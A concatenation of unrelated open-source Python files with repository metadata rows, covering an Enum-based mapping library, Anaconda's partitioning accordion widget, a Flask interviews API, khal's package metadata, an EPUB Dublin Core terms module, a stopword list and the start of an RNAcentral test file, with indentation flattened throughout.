cls.__tuple_class = tuple_class
return tuple_class
@classmethod
def set_types(cls, *types, **named_types):
"""Set `types` mapping for `map/tuple_casted` methods.
>>> Pastry = Enumap("Pastry", names="croissant donut muffin")
>>> Pastry.set_types(int, int, int, donut=float)
>>> Pastry.types() # donut kwarg overrides donut arg
{'croissant': int, 'donut': float, 'muffin': int}
"""
# type mappings are allowed to be a subset of the member keys
# in other words, not all members have to have a type
sparse_types = SparseEnumap("temporary_types", cls.names())
sparse_type_map = sparse_types.map(*types, **named_types)
non_null_types = {k: v for k, v in sparse_type_map.items()
if v is not None}
type_subset = Enumap(f"{cls.__name__}_types",
tuple(non_null_types.keys()))
cls.__member_types = type_subset.map(*types, **named_types)
@classmethod
def types(cls):
"""Mapping like `{member_name: callable}` for `map/tuple_casted`.
This can either come from type annotations or `set_types`."""
try:
return cls.__member_types
except AttributeError:
types = dict(getattr(cls, "__annotations__", {}))
cls.__member_types = types
return cls.__member_types
@classmethod
def _make_checked_mapping(cls, *values, **named_values):
"""Generate key-value pairs where keys are strictly the names
of the members of this Enum. Raises `KeyError` for both
missing and invalid keys."""
names = cls.names()
mapping = dict(zip(names, values), **named_values)
if set(mapping) == set(names) and len(values) <= len(names):
return mapping
else:
cls._raise_invalid_args(values, mapping, names)
@classmethod
def _make_casted_mapping(cls, *values, **named_values):
"""Like `_make_checked_mapping`, but values are casted based
on the `types()` mapping"""
mapping = cls._make_checked_mapping(*values, **named_values)
mapping.update(_type_cast_items(mapping, cls.types()))
return mapping
@classmethod
def _raise_invalid_args(cls, values, mapping, names):
missing = (set(names) - set(mapping)) or {}
invalid = (set(mapping) - set(names)) or {}
if len(values) > len(names):
n_args = len(values)
n_expected = len(names)
raise KeyError(
f"{cls.__name__} requires keys {names}; "
f"expected {n_expected} arguments, got {n_args}")
else:
raise KeyError(
f"{cls.__name__} requires keys {names}; "
f"missing keys {missing}; invalid keys {invalid}")
def _type_cast_items(mapping, types):
"""Generates key/value pairs for which each
value is casted with the callable in the `types` mapping.
"""
key = None
try:
for key, type_callable in types.items():
yield key, type_callable(mapping[key])
except Exception as e:
value = mapping.get(key)
value_type = type(value).__name__
raise TypeCastError(f"Key '{key}' got invalid value '{value}' "
f"of type {value_type} (error: '{e}')", key)
class TypeCastError(TypeError):
"""Raised when an Enumap field raises an exception
during type casting for Enumap.tuple_casted or Enumap.map_casted
Attributes
key: key or field name for which a value could not be
successfully type casted
"""
def __init__(self, message, key):
super().__init__(message)
self.key = key
class default(enum.auto):
"""A subclass of enum.auto that
1. behaves as a unqiue enum member because enum members that aren't unique
effectively become aliases
2. gives the user a way of signaling that an enum value should be used as
a default in the collections created by SparseEnumap.map() or .tuple()
Sample usage:
>>> class Pets(SparseEnumap):
... dogs: int = default(3)
... cats: int = default(44)
... squirrels: float = 3 # this isn't a default at all
>>> Pets.tuple()
Pets_tuple(dogs=3, cats=44, squirrels=None)
"""
def __init__(self, default_value=None):
self._value = (enum.auto.value, default_value)
@property
def value(self):
return self
@value.setter
def value(self, new_value):
actual_default = self._value[-1]
self._value = (new_value, actual_default)
@property
def default(self):
return self._value[1]
def _iter_member_defaults(members):
"""Iterates through Enum members and teases out the default value
the user selected with `default(<user's special value>)` from the
`default` object.
"""
for k, v in members.items():
if isinstance(v.value, default):
yield k, v.value.default
# By not yielding k, v for non-default() objects, we avoid using
# things like auto() as defaults in our .tuple()/.map() collections.
# This makes it explicit when a user is using an enum value
# as a default while ALSO allowing SparseEnumaps to adhere to the
# rules of Enums. Each value of an Enum must be unique, and those that
# aren't are basically just aliases
class SparseEnumapMeta(EnumapMeta):
"""An EnumMeta for friendlier, more informative REPL behavior"""
def _iter_fmt_parts(cls):
# None defaults are not explicitly shown for readability
names = cls.names()
types = cls.types()
defaults = cls.defaults()
for name in names:
type_ = types.get(name)
default = defaults.get(name)
type_info = f": {type_.__name__}" if type_ is not None else ""
default_info = f" = {default!r}" if default is not None else ""
yield f"{name}{type_info}{default_info}"
class SparseEnumap(Enumap, metaclass=SparseEnumapMeta):
"""A less strict Enumap that provides default values
for unspecified keys. Invalid keys are still prohibited."""
@classmethod
def set_defaults(cls, *values, **named_values):
cls.__member_defaults = cls.map(*values, **named_values)
@classmethod
def defaults(cls):
try:
return cls.__member_defaults
except AttributeError:
members = cls.__members__
defaults_spec = Enumap("_Defaults", cls.names())
declared_defaults = dict(_iter_member_defaults(members))
member_defaults = defaults_spec.map(
*[None] * len(cls), **declared_defaults)
cls.__member_defaults = member_defaults
return cls.__member_defaults
@classmethod
def _make_checked_mapping(cls, *values, **named_values):
"""Generate key-value pairs where keys are strictly the names
of the members of this Enum. Raises `KeyError` for both
missing and invalid keys."""
names = cls.names()
names_set = set(names)
defaults = cls.defaults()
# Create a mapping which will be a subset of the final,
# sparse mapping. As we go, record which values are present
# in the mapping and which are missing.
if defaults:
mapping = dict(zip(names, values), **named_values)
missing = names_set - set(mapping)
mapping.update(((k, defaults[k]) for k in missing))
else:
mapping = dict(zip_longest(names, values), **named_values)
# If we haven't been passed invalid keys and we haven't been
# passed too many positional arguments, return the mapping
if set(mapping) == names_set and len(values) <= len(names):
return mapping
else:
cls._raise_invalid_args(values, mapping, names)
@classmethod
def _make_casted_mapping(cls, *values, **named_values):
"""Like `_make_checked_mapping`, but values are casted based
on the `types()` mapping"""
names = cls.names()
names_set = set(names)
defaults = cls.defaults()
# Create a mapping which will be a subset of the final,
# sparse mapping. As we go, record which values are present
# in the mapping and which are missing.
if defaults:
mapping = dict(zip(names, values), **named_values)
present = set(mapping)
missing = names_set - present
mapping.update(((k, defaults[k]) for k in missing))
else:
mapping = dict(zip(names, values), **named_values)
present = set(mapping)
missing = names_set - present
# Cast the values of our mapping with the the type function
# corresponding to their keys. We use the `missing` set of keys
# as a guide here because we don't want to cast missing or default
# values.
types = cls.types()
if types:
present_typed = present & set(types)
relevant_types = {key: types[key] for key in present_typed}
mapping.update(_type_cast_items(mapping, relevant_types))
# Handle default values to create a sparse mapping.
# Missing values will either be filled in with what's in the
# `defaults` mapping or with None if the user hasn't set defaults.
temp = dict(defaults) or {}.fromkeys(names)
temp.update(mapping)
mapping = temp
# If we haven't been passed invalid keys and we haven't been
# passed too many positional arguments, return the mapping
if not present - names_set and len(values) <= len(names):
return mapping
else:
cls._raise_invalid_args(values, mapping, names)
@classmethod
def _raise_invalid_args(cls, values, mapping, names):
if len(values) > len(names):
n_args = len(values)
n_expected = len(names)
raise KeyError(
f"{cls.__name__} requires keys {names}; "
f"expected {n_expected} arguments, got {n_args}")
else:
invalid = set(mapping) - set(names)
raise KeyError(f"{cls.__name__} requires keys {names}; "
f"invalid keys {invalid}")
| mit | -2,633,654,742,041,224,000 | 37.02681 | 78 | 0.590031 | false |
atodorov/anaconda | pyanaconda/ui/gui/spokes/lib/accordion.py | 1 | 21359 | # vim: set fileencoding=utf-8
# Mountpoint selector accordion and page classes
#
# Copyright (C) 2012-2014 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.anaconda_loggers import get_module_logger
from pyanaconda.core.constants import DEFAULT_AUTOPART_TYPE
from pyanaconda.core.i18n import _, C_
from pyanaconda.product import productName, productVersion
from pyanaconda.core.storage import get_supported_autopart_choices
from pyanaconda.ui.gui.utils import escape_markup, really_hide, really_show
import gi
gi.require_version("AnacondaWidgets", "3.3")
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, AnacondaWidgets
log = get_module_logger(__name__)
__all__ = ["MountPointSelector", "Accordion", "Page", "UnknownPage", "CreateNewPage"]
DATA_DEVICE = 0
SYSTEM_DEVICE = 1
SYSTEM_MOUNT_POINTS = [
"/", "/boot", "/boot/efi", "/tmp", "/usr",
"/var", "swap", "PPC PReP Boot", "BIOS Boot"
]
class MountPointSelector(AnacondaWidgets.MountpointSelector):
"""The mount point selector."""
def __init__(self):
super().__init__()
self.root_name = ""
@property
def device_name(self):
return self.get_property("name")
@property
def mount_point(self):
return self.get_property("mountpoint")
@property
def mount_point_type(self):
if not self.mount_point or self.mount_point in SYSTEM_MOUNT_POINTS:
return SYSTEM_DEVICE
else:
return DATA_DEVICE
class Accordion(Gtk.Box):
""" An Accordion is a box that goes on the left side of the custom partitioning spoke.
It stores multiple expanders which are here called Pages. These Pages correspond to
individual installed OSes on the system plus some special ones. When one Page is
expanded, all others are collapsed.
"""
def __init__(self):
super().__init__(orientation=Gtk.Orientation.VERTICAL, spacing=12)
self._expanders = []
self._active_selectors = []
self._current_selector = None
self._last_selected = None
def find_page_by_title(self, title):
for e in self._expanders:
if e.get_child().page_title == title:
return e.get_child()
return None
def _on_expanded(self, obj, cb=None):
# Get the content of the expander.
child = obj.get_child()
if child:
# The expander is not expanded yet.
is_expanded = not obj.get_expanded()
# Show or hide the child.
# We need to set this manually because of a gtk bug:
# https://bugzilla.gnome.org/show_bug.cgi?id=776937
child.set_visible(is_expanded)
if cb:
cb(child)
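    # Set a selector's "chosen" state and arrow visibility, then let the
    # owning page update its selection bookkeeping (BasePage.mark_selection).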
def _activate_selector(self, selector, activate, show_arrow):
selector.set_chosen(activate)
selector.props.show_arrow = show_arrow
selector.get_page().mark_selection(selector)
def add_page(self, contents, cb):
label = Gtk.Label(label="""<span size='large' weight='bold' fgcolor='black'>%s</span>""" %
escape_markup(contents.page_title), use_markup=True,
xalign=0, yalign=0.5, wrap=True)
expander = Gtk.Expander()
expander.set_label_widget(label)
expander.add(contents)
self.add(expander)
self._expanders.append(expander)
expander.connect("activate", self._on_expanded, cb)
expander.show_all()
def unselect(self):
""" Unselect all items and clear current_selector.
"""
for s in self._active_selectors:
self._activate_selector(s, False, False)
self._active_selectors.clear()
self._current_selector = None
log.debug("Unselecting all items.")
def select(self, selector):
""" Select one item. Remove selection from all other items
and clear ``current_selector`` if set. Add new selector and
append it to selected items. Also select the new item.
:param selector: Selector which we want to select.
"""
self.unselect()
self._active_selectors.append(selector)
self._current_selector = selector
self._last_selected = selector
self._activate_selector(selector, activate=True, show_arrow=True)
log.debug("Select device: %s", selector.device_name)
def _select_with_shift(self, clicked_selector):
# No items selected, only select this one
if not self._last_selected or self._last_selected is clicked_selector:
self.select(clicked_selector)
return
select_items = []
start_selection = False
for s in self.all_selectors:
if s is clicked_selector or s is self._last_selected:
if start_selection:
select_items.append(s) # append last item too
break
else:
start_selection = True
if start_selection:
select_items.append(s)
self.unselect()
self.append_selection(select_items)
def append_selection(self, selectors):
""" Append new selectors to the actual selection. This takes
list of selectors.
If more than 1 item is selected remove the ``current_selector``.
No current selection is allowed in multiselection.
:param list selectors: List of selectors which will be
appended to current selection.
"""
if not selectors:
return
# If multiselection is already active it will be active even after the new selection.
multiselection = ((self.is_multiselection or len(selectors) > 1) or
# Multiselection will be active also when there is one item already
# selected and it's not the same which is in selectors array
(self._current_selector and self._current_selector not in selectors))
# Hide arrow from current selected item if there will be multiselection.
if not self.is_multiselection and multiselection and self._current_selector:
self._current_selector.props.show_arrow = False
for s in selectors:
self._active_selectors.append(s)
if multiselection:
self._activate_selector(s, activate=True, show_arrow=False)
else:
self._activate_selector(s, activate=True, show_arrow=True)
log.debug("Append device %s to the selection.", s.device_name)
if len(selectors) == 1:
self._last_selected = selectors[-1]
if multiselection:
self._current_selector = None
else:
self._current_selector = self._active_selectors[0]
log.debug("Selected items %s; added items %s",
len(self._active_selectors), len(selectors))
def remove_selection(self, selectors):
""" Remove :param:`selectors` from current selection. If only
one item is selected after this operation it's set as
``current_selector``.
Items which are not selected are ignored.
:param list selectors: List of selectors which will be
removed from current selection.
"""
for s in selectors:
if s in self._active_selectors:
self._activate_selector(s, activate=False, show_arrow=False)
self._active_selectors.remove(s)
log.debug("Device %s is removed from the selection.", s)
if len(self._active_selectors) == 1:
self._current_selector = self._active_selectors[0]
self._current_selector.props.show_arrow = True
else:
self._current_selector = None
log.debug("Selected items %s; removed items %s",
len(self._active_selectors), len(selectors))
@property
def current_page(self):
""" The current page is really a function of the current selector.
Whatever selector on the LHS is selected, the current page is the
page containing that selector.
"""
if not self.current_selector:
return None
for page in self.all_pages:
if self.current_selector in page.members:
return page
return None
@property
def current_selector(self):
return self._current_selector
@property
def all_pages(self):
return [e.get_child() for e in self._expanders]
@property
def all_selectors(self):
return [s for p in self.all_pages for s in p.members]
@property
def all_members(self):
for page in self.all_pages:
for member in page.members:
yield (page, member)
@property
def is_multiselection(self):
return len(self._active_selectors) > 1
@property
def is_current_selected(self):
if self.current_selector:
return True
return False
@property
def selected_items(self):
return self._active_selectors
def page_for_selector(self, selector):
""" Return page for given selector. """
for page in self.all_pages:
for s in page.members:
if s is selector:
return page
def expand_page(self, page_title):
page = self.find_page_by_title(page_title)
expander = page.get_parent()
if not expander:
raise LookupError()
if not expander.get_expanded():
expander.emit("activate")
def remove_page(self, page_title):
# First, remove the expander from the list of expanders we maintain.
target = self.find_page_by_title(page_title)
if not target:
return
self._expanders.remove(target.get_parent())
for s in target.members:
if s in self._active_selectors:
self._active_selectors.remove(s)
# Then, remove it from the box.
self.remove(target.get_parent())
def remove_all_pages(self):
for e in self._expanders:
self.remove(e)
self._expanders = []
self._active_selectors = []
self._current_selector = None
def clear_current_selector(self):
""" If current selector is selected, deselect it
"""
if self._current_selector:
if self._current_selector in self._active_selectors:
self._active_selectors.remove(self._current_selector)
self._activate_selector(self._current_selector, activate=False, show_arrow=False)
self._current_selector = None
def process_event(self, selector, event, cb):
""" Process events from selectors and select items as result.
Call cb after selection is done with old selector and new selector
as arguments.
:param selector: Clicked selector
:param event: Gtk event object
:param cb: Callback which will be called after selection is done.
This callback is setup in :meth:`Page.add_selector` method.
"""
gi.require_version("Gdk", "3.0")
from gi.repository import Gdk
if event:
if event.type not in [Gdk.EventType.BUTTON_PRESS, Gdk.EventType.KEY_RELEASE,
Gdk.EventType.FOCUS_CHANGE]:
return
if event.type == Gdk.EventType.KEY_RELEASE and \
event.keyval not in [Gdk.KEY_space, Gdk.KEY_Return, Gdk.KEY_ISO_Enter, Gdk.KEY_KP_Enter, Gdk.KEY_KP_Space]:
return
old_selector = self.current_selector
# deal with multiselection
state = event.get_state()
if state & Gdk.ModifierType.CONTROL_MASK: # holding CTRL
if selector in self._active_selectors:
self.remove_selection([selector])
else:
self.append_selection([selector])
elif state & Gdk.ModifierType.SHIFT_MASK: # holding SHIFT
self._select_with_shift(selector)
else:
self.select(selector)
# Then, this callback will set up the right hand side of the screen to
# show the details for the newly selected object.
cb(old_selector, selector)
class BasePage(Gtk.Box):
""" Base class for all Pages. It implements most methods which is used
all kind of Page classes.
.. NOTE::
You should not instantiate this class. Please create a subclass
and use the subclass instead.
"""
def __init__(self, title):
super().__init__(orientation=Gtk.Orientation.VERTICAL, spacing=6)
self.members = []
self.page_title = title
self._selected_members = set()
self._data_box = None
self._system_box = None
@property
def selected_members(self):
return self._selected_members
def _get_accordion(self):
return self.get_ancestor(Accordion)
def _make_category_label(self, name):
label = Gtk.Label()
label.set_markup("""<span fgcolor='dark grey' size='large' weight='bold'>%s</span>""" %
escape_markup(name))
label.set_halign(Gtk.Align.START)
label.set_margin_start(24)
return label
def mark_selection(self, selector):
if selector.get_chosen():
self._selected_members.add(selector)
else:
self._selected_members.discard(selector)
def add_selector(self, selector, cb):
accordion = self._get_accordion()
selector.set_page(self)
selector.connect("button-press-event", accordion.process_event, cb)
selector.connect("key-release-event", accordion.process_event, cb)
selector.connect("focus-in-event", self._on_selector_focus_in, cb)
selector.set_margin_bottom(6)
self.members.append(selector)
# pylint: disable=no-member
if selector.mount_point_type == DATA_DEVICE:
self._data_box.add(selector)
else:
self._system_box.add(selector)
def _on_selector_focus_in(self, selector, event, cb):
accordion = self._get_accordion()
cb(accordion.current_selector, selector)
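    # Reveal the category label whenever a selector is added to its box; the
    # matching handler below hides it again when the last selector is removed.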
def _on_selector_added(self, container, widget, label):
really_show(label)
def _on_selector_removed(self, container, widget, label):
# This runs before widget is removed from container, so if it's the last
# item then the container will still not be empty.
if len(container.get_children()) == 1:
really_hide(label)
class Page(BasePage):
""" A Page is a box that is stored in an Accordion. It breaks down all the filesystems that
comprise a single installed OS into two categories - Data filesystems and System filesystems.
Each filesystem is described by a single MountpointSelector.
"""
def __init__(self, title):
super().__init__(title)
# Create the Data label and a box to store all its members in.
self._data_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._data_label = self._make_category_label(_("DATA"))
really_hide(self._data_label)
self._data_box.add(self._data_label)
self._data_box.connect("add", self._on_selector_added, self._data_label)
self._data_box.connect("remove", self._on_selector_removed, self._data_label)
self.add(self._data_box)
# Create the System label and a box to store all its members in.
self._system_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self._system_label = self._make_category_label(_("SYSTEM"))
really_hide(self._system_label)
self._system_box.add(self._system_label)
self._system_box.connect("add", self._on_selector_added, self._system_label)
self._system_box.connect("remove", self._on_selector_removed, self._system_label)
self.add(self._system_box)
class UnknownPage(BasePage):
def add_selector(self, selector, cb):
accordion = self._get_accordion()
selector.set_page(self)
selector.connect("button-press-event", accordion.process_event, cb)
selector.connect("key-release-event", accordion.process_event, cb)
self.members.append(selector)
self.add(selector)
class CreateNewPage(BasePage):
""" This is a special Page that is displayed when no new installation
has been automatically created, and shows the user how to go about
doing that. The intention is that an instance of this class will be
packed into the Accordion first and then when the new installation
is created, it will be removed and replaced with a Page for it.
"""
def __init__(self, title, create_clicked_cb, autopart_type_changed_cb,
partitions_to_reuse=True):
super().__init__(title)
# Create a box where we store the "Here's how you create a new blah" info.
self._createBox = Gtk.Grid()
self._createBox.set_row_spacing(6)
self._createBox.set_column_spacing(6)
self._createBox.set_margin_start(16)
label = Gtk.Label(label=_("You haven't created any mount points for your "
"%(product)s %(version)s installation yet. "
"You can:") % {"product" : productName, "version" : productVersion},
wrap=True, xalign=0, yalign=0.5)
self._createBox.attach(label, 0, 0, 2, 1)
dot = Gtk.Label(label="•", xalign=0.5, yalign=0.4, hexpand=False)
self._createBox.attach(dot, 0, 1, 1, 1)
self._createNewButton = Gtk.LinkButton(uri="",
label=C_("GUI|Custom Partitioning|Autopart Page", "_Click here to create them automatically."))
label = self._createNewButton.get_children()[0]
label.set_xalign(0)
label.set_yalign(0.5)
label.set_hexpand(True)
label.set_line_wrap(True)
label.set_use_underline(True)
# Create this now to pass into the callback. It will be populated later
# on in this method.
store = Gtk.ListStore(str, int)
combo = Gtk.ComboBox(model=store)
cellrendr = Gtk.CellRendererText()
combo.pack_start(cellrendr, True)
combo.add_attribute(cellrendr, "text", 0)
combo.connect("changed", autopart_type_changed_cb)
self._createNewButton.set_has_tooltip(False)
self._createNewButton.set_halign(Gtk.Align.START)
self._createNewButton.connect("clicked", create_clicked_cb, combo)
self._createNewButton.connect("activate-link", lambda *args: Gtk.true())
self._createBox.attach(self._createNewButton, 1, 1, 1, 1)
dot = Gtk.Label(label="•", xalign=0.5, yalign=0, hexpand=False)
self._createBox.attach(dot, 0, 2, 1, 1)
label = Gtk.Label(label=_("Create new mount points by clicking the '+' button."),
xalign=0, yalign=0.5, hexpand=True, wrap=True)
self._createBox.attach(label, 1, 2, 1, 1)
if partitions_to_reuse:
dot = Gtk.Label(label="•", xalign=0.5, yalign=0, hexpand=False)
self._createBox.attach(dot, 0, 3, 1, 1)
label = Gtk.Label(label=_("Or, assign new mount points to existing "
"partitions after selecting them below."),
xalign=0, yalign=0.5, hexpand=True, wrap=True)
self._createBox.attach(label, 1, 3, 1, 1)
label = Gtk.Label(label=C_("GUI|Custom Partitioning|Autopart Page", "_New mount points will use the following partitioning scheme:"),
xalign=0, yalign=0.5, wrap=True, use_underline=True)
self._createBox.attach(label, 0, 4, 2, 1)
label.set_mnemonic_widget(combo)
default = None
for name, code in get_supported_autopart_choices():
itr = store.append([_(name), code])
if code == DEFAULT_AUTOPART_TYPE:
default = itr
combo.set_margin_start(18)
combo.set_margin_end(18)
combo.set_hexpand(False)
combo.set_active_iter(default or store.get_iter_first())
self._createBox.attach(combo, 0, 5, 2, 1)
self.add(self._createBox)
| gpl-2.0 | -7,701,931,762,083,401,000 | 37.894353 | 141 | 0.614527 | false |
michaelnetbiz/mistt-solution | app/controllers/interviews.py | 1 | 2627 | from app import db
from app.models.interviews import InterviewSevenDays, InterviewNinetyDays
from flask import Blueprint, make_response, jsonify
from flask_cors import cross_origin
from flask_login import login_required
# instantiate the module's blueprint
interviews = Blueprint('interviews', __name__, template_folder='interviews', url_prefix='/interviews')
@cross_origin()
@interviews.route('/seven/', methods=['GET', 'POST'])
@login_required
def get_interviews_7_days():
return make_response(jsonify([service_plan for service_plan in db.InterviewSevenDays.find()]), 200)
@cross_origin()
@interviews.route('/seven/descriptives/', methods=['GET', 'POST'])
@login_required
def get_interviews_7_days_descriptives():
return make_response(jsonify([service_plan for service_plan in db.InterviewSevenDays.find()]), 200)
@cross_origin()
@interviews.route('/ninety/', methods=['GET', 'POST'])
@login_required
def get_interviews_90_days():
return make_response(jsonify([service_plan for service_plan in db.InterviewNinetyDays.find()]), 200)
@cross_origin()
@interviews.route('/ninety/descriptives/', methods=['GET', 'POST'])
@login_required
def get_interviews_90_days_descriptives():
return make_response(jsonify([service_plan for service_plan in db.InterviewNinetyDays.find()]), 200)
@cross_origin()
@interviews.route('/seven/scores/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_7_days_scores(_id):
return make_response(jsonify(db.InterviewSevenDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/ninety/scores/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_90_days_scores(_id):
return make_response(jsonify(db.InterviewNinetyDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/seven/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_7_days(_id):
    return make_response(jsonify(db.InterviewSevenDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/ninety/<string:_id>/', methods=['GET', 'POST'])
@login_required
def get_interview_90_days(_id):
return make_response(jsonify(db.InterviewNinetyDays.find_one_or_404({'_id': _id})), 200)
@cross_origin()
@interviews.route('/seven/count/', methods=['GET', 'POST'])
@login_required
def get_interviews_7_days_count():
return make_response(jsonify(db['interview_7_days'].count()))
@cross_origin()
@interviews.route('/ninety/count/', methods=['GET', 'POST'])
@login_required
def get_interviews_90_days_count():
return make_response(jsonify(db['interview_90_days'].count()))
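# Registration sketch (assumption: an application factory or central app module
# exists elsewhere in this package):
#
#     app.register_blueprint(interviews)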
| mit | -7,827,549,883,789,478,000 | 32.679487 | 104 | 0.719833 | false |
hobarrera/khal | khal/__init__.py | 1 | 1725 | # Copyright (c) 2013-2017 Christian Geier et al.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
try:
from khal.version import version
except ImportError:
import sys
sys.exit('Failed to find (autogenerated) version.py. This might be due to '
'using GitHub\'s tarballs or svn access. Either clone '
'from GitHub via git or get a tarball from PyPI.')
__productname__ = 'khal'
__version__ = version
__author__ = 'Christian Geier'
__copyright__ = 'Copyright (c) 2013-2017 Christian Geier et al.'
__author_email__ = '[email protected]'
__description__ = 'A standards based terminal calendar'
__license__ = 'Expat/MIT, see COPYING'
__homepage__ = 'https://lostpackets.de/khal/'
| mit | 2,818,969,302,320,337,000 | 45.621622 | 79 | 0.738551 | false |
meng89/epubuilder | epubaker/metas/dcterms.py | 1 | 2746 | # coding=utf-8
"""Dublin Core Metadata Initiative, see http://dublincore.org/documents/dcmi-terms/"""
from epubaker.metas.attrs import Attrs, AltScript, Dir, FileAs, Id, Role, Lang
from epubaker.xl import Element, URI_XML
def always_true(*args, **kwargs):
pass
l = [
'abstract', 'accessRights', 'accrualMethod', 'accrualPeriodicity', 'accrualPolicy', 'alternative', 'audience',
'available',
'bibliographicCitation',
'conformsTo', 'contributor', 'coverage', 'created', 'creator',
'date', 'dateAccepted', 'dateCopyrighted', 'dateSubmitted', 'description',
'educationLevel', 'extent',
'format',
'hasFormat', 'hasPart', 'hasVersion',
'identifier', 'instructionalMethod',
'isFormatOf', 'isPartOf', 'isReferencedBy', 'isReplacedBy', 'isRequiredBy', 'issued', 'isVersionOf',
'language', 'license',
'mediator', 'medium', 'modified',
'provenance', 'publisher',
'references', 'relation', 'replaces', 'requires', 'rights', 'rightsHolder',
'source', 'spatial', 'subject',
'tableOfContents', 'temporal', 'title', 'type',
'valid'
]
check_funcs = {
'modified': always_true,
}
check_funcs.update(dict((one, always_true) for one in l if one not in check_funcs.keys()))
_attr_check_funcs = {
# identifier only
'opf:scheme': always_true,
'opf:alt-script': always_true,
'dir': always_true,
'opf:file-as': always_true,
'id': always_true,
'opf:role': always_true,
'xml:lang': always_true,
# subject only
'opf:authority': always_true,
# Meta only
'scheme': always_true
}
URI_DC = 'http://purl.org/dc/elements/1.1/'
URI_OPF = 'http://www.idpf.org/2007/opf'
namespace_map = {
'dc': URI_DC,
'opf': URI_OPF,
'xml': URI_XML
}
class _Base(Attrs):
def __init__(self, text):
check_funcs[self.__class__.__name__](text)
Attrs.__init__(self)
self._text = text
@property
def text(self):
return self._text
def to_element(self):
e = Element((None, 'meta'))
e.attributes[(None, 'property')] = 'dcterms:{}'.format(self.__class__.__name__)
for attr_name, value in self._attrs.items():
uri = None
if ':' in attr_name:
prefix, attr = attr_name.split(':')
uri = namespace_map[prefix]
e.prefixes[uri] = prefix
else:
attr = attr_name
e.attributes[(uri, attr)] = value
e.children.append(self.text)
return e
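# Dynamically build one element class per DCMI term name listed above; each
# class mixes the shared attribute helpers (alt-script, dir, file-as, id, role,
# xml:lang) into the _Base behaviour.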
_classes = {}
for k, v in check_funcs.items():
_classes[k] = type(k, (_Base, AltScript, Dir, FileAs, Id, Role, Lang), {})
def get_dcterm(name):
"""get a term class by term name"""
return _classes[name]
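# Usage sketch (an assumption based on the classes generated above):
#
#     Modified = get_dcterm('modified')
#     element = Modified('2016-01-01').to_element()  # dcterms:modified <meta>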
| mit | -3,042,853,000,001,800,700 | 23.300885 | 114 | 0.59177 | false |
Darth-Neo/Gensim | Pattern/stopWords.py | 1 | 1347 |
# Used to add words to the stoplist
from nltk.corpus import stopwords
stop = stopwords.words(u'english')
# Add Stopwords
stop.append(u"of")
stop.append(u"the")
stop.append(u"not")
stop.append(u"to")
stop.append(u"or")
stop.append(u"this")
stop.append(u"all")
stop.append(u"on")
stop.append(u"with")
stop.append(u"we")
stop.append(u"in")
stop.append(u"This")
stop.append(u"The")
stop.append(u",")
stop.append(u".")
stop.append(u"..")
stop.append(u"...")
stop.append(u"...).")
stop.append(u"\")..")
stop.append(u".")
stop.append(u";")
stop.append(u"/")
stop.append(u")")
stop.append(u"(")
stop.append(u"must")
stop.append(u"system")
stop.append(u"This")
stop.append(u"The")
stop.append(u",")
stop.append(u"must")
stop.append(u"and")
stop.append(u"of")
stop.append(u"by")
stop.append(u"program")
stop.append(u"analysis")
stop.append(u"solution")
stop.append(u"stage")
stop.append(u"updated")
stop.append(u"\u2022")
stop.append(u"<h2>")
stop.append(u"</h2>")
stop.append(u"</strong></h2>")
stop.append(u"raportal")
stop.append(u"project")
stop.append(u"Project")
stop.append(u"wbs")
stop.append(u"WBS")
strp = list()
strp.append(u"<strong>")
strp.append(u"a>")
strp.append(u"<a>")
strp.append(u"<strong>")
strp.append(u"</")
strp.append(u"</h2")
strp.append(u"ttp://")
strp.append(u">")
strp.append(u"<a></a>")
strp.append(u"1>")
strp.append(u"\n") | gpl-3.0 | 1,625,549,348,415,467,000 | 19.424242 | 35 | 0.673348 | false |
RNAcentral/rnacentral-import-pipeline | tests/rnacentral/search_export/exporter_test.py | 1 | 37307 | # -*- coding: utf-8 -*-
"""
Copyright [2009-2017] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import json
import operator as op
import os
import re
import subprocess
import tempfile
import xml.etree.ElementTree as ET
from functools import lru_cache
from xml.dom import minidom
import pytest
import six
from rnacentral_pipeline.rnacentral.search_export import exporter
